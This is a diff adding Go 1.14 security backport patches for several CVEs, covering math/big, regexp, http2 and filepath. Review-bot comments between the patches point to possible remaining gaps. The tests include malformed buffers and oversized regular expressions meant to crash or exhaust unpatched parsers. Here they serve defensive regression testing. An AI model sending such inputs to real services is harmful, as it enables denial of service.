+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
@@ -0,0 +1,113 @@
+From 027e7e1578d3d7614f7586eff3894b83d9709e14 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 29 Aug 2022 10:08:34 +0530
+Subject: [PATCH] CVE-2022-32189
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/703c8ab7e5ba75c95553d4e249309297abad7102]
+CVE: CVE-2022-32189
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/math/big/floatmarsh.go | 7 +++++++
+ src/math/big/floatmarsh_test.go | 12 ++++++++++++
+ src/math/big/ratmarsh.go | 6 ++++++
+ src/math/big/ratmarsh_test.go | 12 ++++++++++++
+ 4 files changed, 37 insertions(+)
+
+diff --git a/src/math/big/floatmarsh.go b/src/math/big/floatmarsh.go
+index d1c1dab..990e085 100644
+--- a/src/math/big/floatmarsh.go
++++ b/src/math/big/floatmarsh.go
+@@ -8,6 +8,7 @@ package big
+
+ import (
+ "encoding/binary"
++ "errors"
+ "fmt"
+ )
+
+@@ -67,6 +68,9 @@ func (z *Float) GobDecode(buf []byte) error {
+ *z = Float{}
+ return nil
+ }
++ if len(buf) < 6 {
++ return errors.New("Float.GobDecode: buffer too small")
++ }
+
+ if buf[0] != floatGobVersion {
+ return fmt.Errorf("Float.GobDecode: encoding version %d not supported", buf[0])
+@@ -83,6 +87,9 @@ func (z *Float) GobDecode(buf []byte) error {
+ z.prec = binary.BigEndian.Uint32(buf[2:])
+
+ if z.form == finite {
++ if len(buf) < 10 {
++ return errors.New("Float.GobDecode: buffer too small for finite form float")
++ }
+ z.exp = int32(binary.BigEndian.Uint32(buf[6:]))
+ z.mant = z.mant.setBytes(buf[10:])
+ }
+diff --git a/src/math/big/floatmarsh_test.go b/src/math/big/floatmarsh_test.go
+index c056d78..401f45a 100644
+--- a/src/math/big/floatmarsh_test.go
++++ b/src/math/big/floatmarsh_test.go
+@@ -137,3 +137,15 @@ func TestFloatJSONEncoding(t *testing.T) {
+ }
+ }
+ }
++
++func TestFloatGobDecodeShortBuffer(t *testing.T) {
++ for _, tc := range [][]byte{
++ []byte{0x1, 0x0, 0x0, 0x0},
++ []byte{0x1, 0xfa, 0x0, 0x0, 0x0, 0x0},
++ } {
++ err := NewFloat(0).GobDecode(tc)
++ if err == nil {
++ t.Error("expected GobDecode to return error for malformed input")
++ }
++ }
++}
+diff --git a/src/math/big/ratmarsh.go b/src/math/big/ratmarsh.go
+index fbc7b60..56102e8 100644
+--- a/src/math/big/ratmarsh.go
++++ b/src/math/big/ratmarsh.go
+@@ -45,12 +45,18 @@ func (z *Rat) GobDecode(buf []byte) error {
+ *z = Rat{}
+ return nil
+ }
++ if len(buf) < 5 {
++ return errors.New("Rat.GobDecode: buffer too small")
++ }
+ b := buf[0]
+ if b>>1 != ratGobVersion {
+ return fmt.Errorf("Rat.GobDecode: encoding version %d not supported", b>>1)
+ }
+ const j = 1 + 4
+ i := j + binary.BigEndian.Uint32(buf[j-4:j])
++ if len(buf) < int(i) {
++ return errors.New("Rat.GobDecode: buffer too small")
++ }
+ z.a.neg = b&1 != 0
+ z.a.abs = z.a.abs.setBytes(buf[j:i])
+ z.b.abs = z.b.abs.setBytes(buf[i:])
+diff --git a/src/math/big/ratmarsh_test.go b/src/math/big/ratmarsh_test.go
+index 351d109..55a9878 100644
+--- a/src/math/big/ratmarsh_test.go
++++ b/src/math/big/ratmarsh_test.go
+@@ -123,3 +123,15 @@ func TestRatXMLEncoding(t *testing.T) {
+ }
+ }
+ }
++
++func TestRatGobDecodeShortBuffer(t *testing.T) {
++ for _, tc := range [][]byte{
++ []byte{0x2},
++ []byte{0x2, 0x0, 0x0, 0x0, 0xff},
++ } {
++ err := NewRat(1, 2).GobDecode(tc)
++ if err == nil {
++ t.Error("expected GobDecode to return error for malformed input")
++ }
++ }
++}
+--
+2.25.1
+
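Review bot: In Rat.GobDecode, `i := j + binary.BigEndian.Uint32(buf[j-4:j])` is computed in uint32, so a large length field can wrap `i` below `j`, and the added `len(buf) < int(i)` check does not reject that before `buf[j:i]` is sliced. On platforms with a 32-bit int, `int(i)` can also turn negative and pass the check. Widening the comparison covers both cases: `if i < j || uint64(len(buf)) < uint64(i) {`. The rest of the function lies outside the hunk, so whether anything later re-validates `i` is not visible here.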
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
new file mode 100644
index 0000000000..fac0ebe94c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
@@ -0,0 +1,271 @@
+From e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Wed, 28 Sep 2022 11:18:51 -0400
+Subject: [PATCH] [release-branch.go1.18] regexp: limit size of parsed regexps
+
+Set a 128 MB limit on the amount of space used by []syntax.Inst
+in the compiled form corresponding to a given regexp.
+
+Also set a 128 MB limit on the rune storage in the *syntax.Regexp
+tree itself.
+
+Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting this issue.
+
+Fixes CVE-2022-41715.
+Updates #55949.
+Fixes #55950.
+
+Change-Id: Ia656baed81564436368cf950e1c5409752f28e1b
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1592136
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/438501
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997]
+CVE: CVE-2022-41715
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ src/regexp/syntax/parse.go | 145 ++++++++++++++++++++++++++++++--
+ src/regexp/syntax/parse_test.go | 13 +--
+ 2 files changed, 148 insertions(+), 10 deletions(-)
+
+diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
+index 55bd20d..60491d5 100644
+--- a/src/regexp/syntax/parse.go
++++ b/src/regexp/syntax/parse.go
+@@ -90,15 +90,49 @@ const (
+ // until we've allocated at least maxHeight Regexp structures.
+ const maxHeight = 1000
+
++// maxSize is the maximum size of a compiled regexp in Insts.
++// It too is somewhat arbitrarily chosen, but the idea is to be large enough
++// to allow significant regexps while at the same time small enough that
++// the compiled form will not take up too much memory.
++// 128 MB is enough for a 3.3 million Inst structures, which roughly
++// corresponds to a 3.3 MB regexp.
++const (
++ maxSize = 128 << 20 / instSize
++ instSize = 5 * 8 // byte, 2 uint32, slice is 5 64-bit words
++)
++
++// maxRunes is the maximum number of runes allowed in a regexp tree
++// counting the runes in all the nodes.
++// Ignoring character classes p.numRunes is always less than the length of the regexp.
++// Character classes can make it much larger: each \pL adds 1292 runes.
++// 128 MB is enough for 32M runes, which is over 26k \pL instances.
++// Note that repetitions do not make copies of the rune slices,
++// so \pL{1000} is only one rune slice, not 1000.
++// We could keep a cache of character classes we've seen,
++// so that all the \pL we see use the same rune list,
++// but that doesn't remove the problem entirely:
++// consider something like [\pL01234][\pL01235][\pL01236]...[\pL^&*()].
++// And because the Rune slice is exposed directly in the Regexp,
++// there is not an opportunity to change the representation to allow
++// partial sharing between different character classes.
++// So the limit is the best we can do.
++const (
++ maxRunes = 128 << 20 / runeSize
++ runeSize = 4 // rune is int32
++)
++
+ type parser struct {
+ flags Flags // parse mode flags
+ stack []*Regexp // stack of parsed expressions
+ free *Regexp
+ numCap int // number of capturing groups seen
+ wholeRegexp string
+- tmpClass []rune // temporary char class work space
+- numRegexp int // number of regexps allocated
+- height map[*Regexp]int // regexp height for height limit check
++ tmpClass []rune // temporary char class work space
++ numRegexp int // number of regexps allocated
++ numRunes int // number of runes in char classes
++ repeats int64 // product of all repetitions seen
++ height map[*Regexp]int // regexp height, for height limit check
++ size map[*Regexp]int64 // regexp compiled size, for size limit check
+ }
+
+ func (p *parser) newRegexp(op Op) *Regexp {
+@@ -122,6 +156,104 @@ func (p *parser) reuse(re *Regexp) {
+ p.free = re
+ }
+
++func (p *parser) checkLimits(re *Regexp) {
++ if p.numRunes > maxRunes {
++ panic(ErrInternalError)
++ }
++ p.checkSize(re)
++ p.checkHeight(re)
++}
++
++func (p *parser) checkSize(re *Regexp) {
++ if p.size == nil {
++ // We haven't started tracking size yet.
++ // Do a relatively cheap check to see if we need to start.
++ // Maintain the product of all the repeats we've seen
++ // and don't track if the total number of regexp nodes
++ // we've seen times the repeat product is in budget.
++ if p.repeats == 0 {
++ p.repeats = 1
++ }
++ if re.Op == OpRepeat {
++ n := re.Max
++ if n == -1 {
++ n = re.Min
++ }
++ if n <= 0 {
++ n = 1
++ }
++ if int64(n) > maxSize/p.repeats {
++ p.repeats = maxSize
++ } else {
++ p.repeats *= int64(n)
++ }
++ }
++ if int64(p.numRegexp) < maxSize/p.repeats {
++ return
++ }
++
++ // We need to start tracking size.
++ // Make the map and belatedly populate it
++ // with info about everything we've constructed so far.
++ p.size = make(map[*Regexp]int64)
++ for _, re := range p.stack {
++ p.checkSize(re)
++ }
++ }
++
++ if p.calcSize(re, true) > maxSize {
++ panic(ErrInternalError)
++ }
++}
++
++func (p *parser) calcSize(re *Regexp, force bool) int64 {
++ if !force {
++ if size, ok := p.size[re]; ok {
++ return size
++ }
++ }
++
++ var size int64
++ switch re.Op {
++ case OpLiteral:
++ size = int64(len(re.Rune))
++ case OpCapture, OpStar:
++ // star can be 1+ or 2+; assume 2 pessimistically
++ size = 2 + p.calcSize(re.Sub[0], false)
++ case OpPlus, OpQuest:
++ size = 1 + p.calcSize(re.Sub[0], false)
++ case OpConcat:
++ for _, sub := range re.Sub {
++ size += p.calcSize(sub, false)
++ }
++ case OpAlternate:
++ for _, sub := range re.Sub {
++ size += p.calcSize(sub, false)
++ }
++ if len(re.Sub) > 1 {
++ size += int64(len(re.Sub)) - 1
++ }
++ case OpRepeat:
++ sub := p.calcSize(re.Sub[0], false)
++ if re.Max == -1 {
++ if re.Min == 0 {
++ size = 2 + sub // x*
++ } else {
++ size = 1 + int64(re.Min)*sub // xxx+
++ }
++ break
++ }
++ // x{2,5} = xx(x(x(x)?)?)?
++ size = int64(re.Max)*sub + int64(re.Max-re.Min)
++ }
++
++ if size < 1 {
++ size = 1
++ }
++ p.size[re] = size
++ return size
++}
++
+ func (p *parser) checkHeight(re *Regexp) {
+ if p.numRegexp < maxHeight {
+ return
+@@ -158,6 +290,7 @@ func (p *parser) calcHeight(re *Regexp, force bool) int {
+
+ // push pushes the regexp re onto the parse stack and returns the regexp.
+ func (p *parser) push(re *Regexp) *Regexp {
++ p.numRunes += len(re.Rune)
+ if re.Op == OpCharClass && len(re.Rune) == 2 && re.Rune[0] == re.Rune[1] {
+ // Single rune.
+ if p.maybeConcat(re.Rune[0], p.flags&^FoldCase) {
+@@ -189,7 +322,7 @@ func (p *parser) push(re *Regexp) *Regexp {
+ }
+
+ p.stack = append(p.stack, re)
+- p.checkHeight(re)
++ p.checkLimits(re)
+ return re
+ }
+
+@@ -305,7 +438,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
+ re.Sub = re.Sub0[:1]
+ re.Sub[0] = sub
+ p.stack[n-1] = re
+- p.checkHeight(re)
++ p.checkLimits(re)
+
+ if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
+ return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
+@@ -509,6 +642,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
+
+ for j := start; j < i; j++ {
+ sub[j] = p.removeLeadingString(sub[j], len(str))
++ p.checkLimits(sub[j])
+ }
+ suffix := p.collapse(sub[start:i], OpAlternate) // recurse
+
+@@ -566,6 +700,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
+ for j := start; j < i; j++ {
+ reuse := j != start // prefix came from sub[start]
+ sub[j] = p.removeLeadingRegexp(sub[j], reuse)
++ p.checkLimits(sub[j])
+ }
+ suffix := p.collapse(sub[start:i], OpAlternate) // recurse
+
+diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
+index 1ef6d8a..67e3c56 100644
+--- a/src/regexp/syntax/parse_test.go
++++ b/src/regexp/syntax/parse_test.go
+@@ -484,12 +484,15 @@ var invalidRegexps = []string{
+ `(?P<>a)`,
+ `[a-Z]`,
+ `(?i)[a-Z]`,
+- `a{100000}`,
+- `a{100000,}`,
+- "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
+- strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
+- strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
+ `\Q\E*`,
++ `a{100000}`, // too much repetition
++ `a{100000,}`, // too much repetition
++ "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})", // too much repetition
++ strings.Repeat("(", 1000) + strings.Repeat(")", 1000), // too deep
++ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000), // too deep
++ "(" + strings.Repeat("(xx?)", 1000) + "){1000}", // too long
++ strings.Repeat("(xx?){1000}", 1000), // too long
++ strings.Repeat(`\pL`, 27000), // too many runes
+ }
+
+ var onlyPerl = []string{
+--
+2.25.1
+
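Review bot: The new `panic(ErrInternalError)` calls in `checkLimits` and `checkSize` only turn into a parse error if the parser's entry point recovers them, and no hunk in this patch shows that recover. Presumably it arrived with the earlier backport that introduced `maxHeight` (visible here only as context), but it is worth confirming on the go-1.14 tree, because without it an oversized pattern would take down the caller instead of failing the parse. I would also document the contract on the function, e.g. `// checkLimits panics with ErrInternalError when the rune or compiled-size budget is exceeded; the top-level parse is expected to recover it and return an *Error.` The added `invalidRegexps` entries only guard this if the regexp/syntax tests are actually run against the patched sources.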
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
new file mode 100644
index 0000000000..8bf22ee4d4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
@@ -0,0 +1,75 @@
+From 618120c165669c00a1606505defea6ca755cdc27 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 30 Nov 2022 16:46:33 -0500
+Subject: [PATCH] [release-branch.go1.19] net/http: update bundled
+ golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+For #56350.
+For #57009.
+Fixes CVE-2022-41717.
+
+Change-Id: I5c6ce546add81f361dcf0d5123fa4eaaf8f0a03b
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1663835
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/455363
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Jenny Rakoczy <jenny@golang.org>
+Reviewed-by: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27]
+CVE-2022-41717
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/h2_bundle.go | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 83f2a72..cc03a62 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -4096,6 +4096,7 @@ type http2serverConn struct {
+ headerTableSize uint32
+ peerMaxHeaderListSize uint32 // zero means unknown (default)
+ canonHeader map[string]string // http2-lower-case -> Go-Canonical-Case
++ canonHeaderKeysSize int // canonHeader keys size in bytes
+ writingFrame bool // started writing a frame (on serve goroutine or separate)
+ writingFrameAsync bool // started a frame on its own goroutine but haven't heard back on wroteFrameCh
+ needsFrameFlush bool // last frame write wasn't a flush
+@@ -4278,6 +4279,13 @@ func (sc *http2serverConn) condlogf(err error, format string, args ...interface{
+ }
+ }
+
++// maxCachedCanonicalHeadersKeysSize is an arbitrarily-chosen limit on the size
++// of the entries in the canonHeader cache.
++// This should be larger than the size of unique, uncommon header keys likely to
++// be sent by the peer, while not so high as to permit unreasonable memory usage
++// if the peer sends an unbounded number of unique header keys.
++const http2maxCachedCanonicalHeadersKeysSize = 2048
++
+ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.serveG.check()
+ http2buildCommonHeaderMapsOnce()
+@@ -4293,14 +4301,10 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.canonHeader = make(map[string]string)
+ }
+ cv = CanonicalHeaderKey(v)
+- // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
+- // entries in the canonHeader cache. This should be larger than the number
+- // of unique, uncommon header keys likely to be sent by the peer, while not
+- // so high as to permit unreaasonable memory usage if the peer sends an unbounded
+- // number of unique header keys.
+- const maxCachedCanonicalHeaders = 32
+- if len(sc.canonHeader) < maxCachedCanonicalHeaders {
++ size := 100 + len(v)*2 // 100 bytes of map overhead + key + value
++ if sc.canonHeaderKeysSize+size <= http2maxCachedCanonicalHeadersKeysSize {
+ sc.canonHeader[v] = cv
++ sc.canonHeaderKeysSize += size
+ }
+ return cv
+ }
+--
+2.30.2
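Review bot: The header trailer `CVE-2022-41717` is missing the `CVE:` key that the other patches visible in this commit use; it should read `CVE: CVE-2022-41717`. Tooling or auditors that look for the tag in the patch body may not match the bare id, which would leave only the file name to tie this patch to the CVE. The Go change itself needs nothing further from this hunk; `canonicalHeader` begins outside the inner hunk.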
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
new file mode 100644
index 0000000000..f5bffd7a0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
@@ -0,0 +1,53 @@
+From 94e0c36694fb044e81381d112fef3692de7cdf52 Mon Sep 17 00:00:00 2001
+From: Yasuhiro Matsumoto <mattn.jp@gmail.com>
+Date: Fri, 22 Apr 2022 10:07:51 +0900
+Subject: [PATCH 1/2] path/filepath: do not remove prefix "." when following
+ path contains ":".
+
+Fixes #52476
+
+Change-Id: I9eb72ac7dbccd6322d060291f31831dc389eb9bb
+Reviewed-on: https://go-review.googlesource.com/c/go/+/401595
+Auto-Submit: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Alex Brainman <alex.brainman@gmail.com>
+Run-TryBot: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/9cd1818a7d019c02fa4898b3e45a323e35033290
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 26f1833..92dc090 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -116,9 +116,21 @@ func Clean(path string) string {
+ case os.IsPathSeparator(path[r]):
+ // empty path element
+ r++
+- case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
++ case path[r] == '.' && r+1 == n:
+ // . element
+ r++
++ case path[r] == '.' && os.IsPathSeparator(path[r+1]):
++ // ./ element
++ r++
++
++ for r < len(path) && os.IsPathSeparator(path[r]) {
++ r++
++ }
++ if out.w == 0 && volumeNameLen(path[r:]) > 0 {
++ // When joining prefix "." and an absolute path on Windows,
++ // the prefix should not be removed.
++ out.append('.')
++ }
+ case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+ // .. element: remove to last separator
+ r += 2
+--
+2.7.4
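Review bot: The `./ element` case this patch adds to `Clean` is removed again by CVE-2022-41722-2.patch, whose description says it reverts CL 401595, so once both are applied this patch contributes no code of its own. Its header nevertheless carries `CVE: CVE-2022-41722` as if it were the fix. Marking it as a prerequisite the way the CVE-2022-41725 patches do, `CVE: CVE-2022-41722 #Dependency Patch1`, would make clear which patch actually closes the issue. The `Upstream-Status` line also reads `Backport from URL` where the neighbouring patches use `Backport [URL]`. `Clean` starts and ends outside the inner hunk.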
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
new file mode 100644
index 0000000000..e1f7a55581
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
@@ -0,0 +1,104 @@
+From b8803cb711ae163b8e67897deb6cf8c49702227c Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 12 Dec 2022 16:43:37 -0800
+Subject: [PATCH 2/2] path/filepath: do not Clean("a/../c:/b") into c:\b on
+ Windows
+
+Do not permit Clean to convert a relative path into one starting
+with a drive reference. This change causes Clean to insert a .
+path element at the start of a path when the original path does not
+start with a volume name, and the first path element would contain
+a colon.
+
+This may introduce a spurious but harmless . path element under
+some circumstances. For example, Clean("a/../b:/../c") becomes `.\c`.
+
+This reverts CL 401595, since the change here supersedes the one
+in that CL.
+
+Thanks to RyotaK (https://twitter.com/ryotkak) for reporting this issue.
+
+Updates #57274
+Fixes #57276
+Fixes CVE-2022-41722
+
+Change-Id: I837446285a03aa74c79d7642720e01f354c2ca17
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1675249
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+(cherry picked from commit 8ca37f4813ef2f64600c92b83f17c9f3ca6c03a5)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728944
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468119
+Reviewed-by: Than McIntosh <thanm@google.com>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/bdf07c2e168baf736e4c057279ca12a4d674f18c
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 27 ++++++++++++++-------------
+ 1 file changed, 14 insertions(+), 13 deletions(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 92dc090..f0f095e 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -14,6 +14,7 @@ package filepath
+ import (
+ "errors"
+ "os"
++ "runtime"
+ "sort"
+ "strings"
+ )
+@@ -116,21 +117,9 @@ func Clean(path string) string {
+ case os.IsPathSeparator(path[r]):
+ // empty path element
+ r++
+- case path[r] == '.' && r+1 == n:
++ case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
+ // . element
+ r++
+- case path[r] == '.' && os.IsPathSeparator(path[r+1]):
+- // ./ element
+- r++
+-
+- for r < len(path) && os.IsPathSeparator(path[r]) {
+- r++
+- }
+- if out.w == 0 && volumeNameLen(path[r:]) > 0 {
+- // When joining prefix "." and an absolute path on Windows,
+- // the prefix should not be removed.
+- out.append('.')
+- }
+ case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+ // .. element: remove to last separator
+ r += 2
+@@ -156,6 +145,18 @@ func Clean(path string) string {
+ if rooted && out.w != 1 || !rooted && out.w != 0 {
+ out.append(Separator)
+ }
++ // If a ':' appears in the path element at the start of a Windows path,
++ // insert a .\ at the beginning to avoid converting relative paths
++ // like a/../c: into c:.
++ if runtime.GOOS == "windows" && out.w == 0 && out.volLen == 0 && r != 0 {
++ for i := r; i < n && !os.IsPathSeparator(path[i]); i++ {
++ if path[i] == ':' {
++ out.append('.')
++ out.append(Separator)
++ break
++ }
++ }
++ }
+ // copy element
+ for ; r < n && !os.IsPathSeparator(path[r]); r++ {
+ out.append(path[r])
+--
+2.7.4
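Review bot: No regression test accompanies the new Windows-only branch in `Clean`; the diffstat lists `path.go` alone. Since this is a backport onto a much older tree, I would add cases to the Windows Clean test table for the inputs named in the patch itself: `a/../c:` expecting `.\c:`, and `a/../c:/b` expecting `.\c:\b`. That pins the behaviour the added comment describes (a relative path must not come out starting with a drive reference). `Clean` begins and ends outside the hunk.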
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
new file mode 100644
index 0000000000..a93fa31dcd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
@@ -0,0 +1,156 @@
+From 451766789f646617157c725e20c955d4a9a70d4e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 6 Feb 2023 10:03:44 -0800
+Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+Fixes CVE-2022-41723
+Fixes #58355
+Updates #57855
+
+Change-Id: Ie870562a6f6e44e4e8f57db6a0dde1a41a2b090c
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728939
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468118
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+Reviewed-by: Than McIntosh <thanm@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5c3e11bd0b5c0a86e5beffcd4339b86a902b21c3]
+CVE: CVE-2022-41723
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/vendor/golang.org/x/net/http2/hpack/hpack.go | 79 +++++++++++++++---------
+ 1 file changed, 49 insertions(+), 30 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http2/hpack/hpack.go b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+index 85f18a2..02e80e3 100644
+--- a/src/vendor/golang.org/x/net/http2/hpack/hpack.go
++++ b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+@@ -359,6 +359,7 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+
+ var hf HeaderField
+ wantStr := d.emitEnabled || it.indexed()
++ var undecodedName undecodedString
+ if nameIdx > 0 {
+ ihf, ok := d.at(nameIdx)
+ if !ok {
+@@ -366,15 +367,27 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+ }
+ hf.Name = ihf.Name
+ } else {
+- hf.Name, buf, err = d.readString(buf, wantStr)
++ undecodedName, buf, err = d.readString(buf)
+ if err != nil {
+ return err
+ }
+ }
+- hf.Value, buf, err = d.readString(buf, wantStr)
++ undecodedValue, buf, err := d.readString(buf)
+ if err != nil {
+ return err
+ }
++ if wantStr {
++ if nameIdx <= 0 {
++ hf.Name, err = d.decodeString(undecodedName)
++ if err != nil {
++ return err
++ }
++ }
++ hf.Value, err = d.decodeString(undecodedValue)
++ if err != nil {
++ return err
++ }
++ }
+ d.buf = buf
+ if it.indexed() {
+ d.dynTab.add(hf)
+@@ -459,46 +472,52 @@ func readVarInt(n byte, p []byte) (i uint64, remain []byte, err error) {
+ return 0, origP, errNeedMore
+ }
+
+-// readString decodes an hpack string from p.
++// readString reads an hpack string from p.
+ //
+-// wantStr is whether s will be used. If false, decompression and
+-// []byte->string garbage are skipped if s will be ignored
+-// anyway. This does mean that huffman decoding errors for non-indexed
+-// strings past the MAX_HEADER_LIST_SIZE are ignored, but the server
+-// is returning an error anyway, and because they're not indexed, the error
+-// won't affect the decoding state.
+-func (d *Decoder) readString(p []byte, wantStr bool) (s string, remain []byte, err error) {
++// It returns a reference to the encoded string data to permit deferring decode costs
++// until after the caller verifies all data is present.
++func (d *Decoder) readString(p []byte) (u undecodedString, remain []byte, err error) {
+ if len(p) == 0 {
+- return "", p, errNeedMore
++ return u, p, errNeedMore
+ }
+ isHuff := p[0]&128 != 0
+ strLen, p, err := readVarInt(7, p)
+ if err != nil {
+- return "", p, err
++ return u, p, err
+ }
+ if d.maxStrLen != 0 && strLen > uint64(d.maxStrLen) {
+- return "", nil, ErrStringLength
++ // Returning an error here means Huffman decoding errors
++ // for non-indexed strings past the maximum string length
++ // are ignored, but the server is returning an error anyway
++ // and because the string is not indexed the error will not
++ // affect the decoding state.
++ return u, nil, ErrStringLength
+ }
+ if uint64(len(p)) < strLen {
+- return "", p, errNeedMore
+- }
